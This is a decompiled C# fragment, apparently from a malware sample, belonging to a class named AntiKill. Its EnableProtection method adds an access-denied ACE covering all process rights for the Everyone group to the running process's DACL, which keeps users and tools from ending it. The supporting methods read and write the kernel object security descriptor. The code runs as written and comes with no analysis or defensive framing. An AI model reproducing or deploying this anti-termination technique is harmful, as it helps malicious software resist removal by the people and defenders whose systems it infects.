// Token: 0x060000AA RID: 170 RVA: 0x0000C168 File Offset: 0x0000A368 public static void SetProcessSecurityDescriptor(IntPtr processHandle, RawSecurityDescriptor dacl) { byte[] array = new byte[dacl.BinaryLength - 1 + 1]; dacl.GetBinaryForm(array, 0); if (!AntiKill.SetKernelObjectSecurity(processHandle, 4, array)) { throw new Win32Exception(); } }
// Token: 0x060000AB RID: 171 RVA: 0x0000C1A0 File Offset: 0x0000A3A0 public static void EnableProtection() { try { IntPtr currentProcess = AntiKill.GetCurrentProcess(); object processSecurityDescriptor = AntiKill.GetProcessSecurityDescriptor(currentProcess); NewLateBinding.LateCall(NewLateBinding.LateGet(processSecurityDescriptor, null, "DiscretionaryAcl", new object[0], null, null, null), null, "InsertAce", new object[] { 0, new CommonAce(AceFlags.None, AceQualifier.AccessDenied, 2035711, new SecurityIdentifier(WellKnownSidType.WorldSid, null), false, null) }, null, null, null, true); AntiKill.SetProcessSecurityDescriptor(currentProcess, (RawSecurityDescriptor)processSecurityDescriptor); } catch (Exception ex) { } }
// Token: 0x060000A9 RID: 169 RVA: 0x0000C10C File Offset: 0x0000A30C public static RawSecurityDescriptor GetProcessSecurityDescriptor(IntPtr processHandle) { byte[] array = new byte[2]; uint num; AntiKill.GetKernelObjectSecurity(processHandle, 4, array, 0u, ref num); array = new byte[num + 1u]; if ((ulong)num < 0UL || (ulong)num > 32767UL) { throw new Win32Exception(); } if (!AntiKill.GetKernelObjectSecurity(processHandle, 4, array, num, ref num)) { throw new Win32Exception(); } return(new RawSecurityDescriptor(array, 0)); }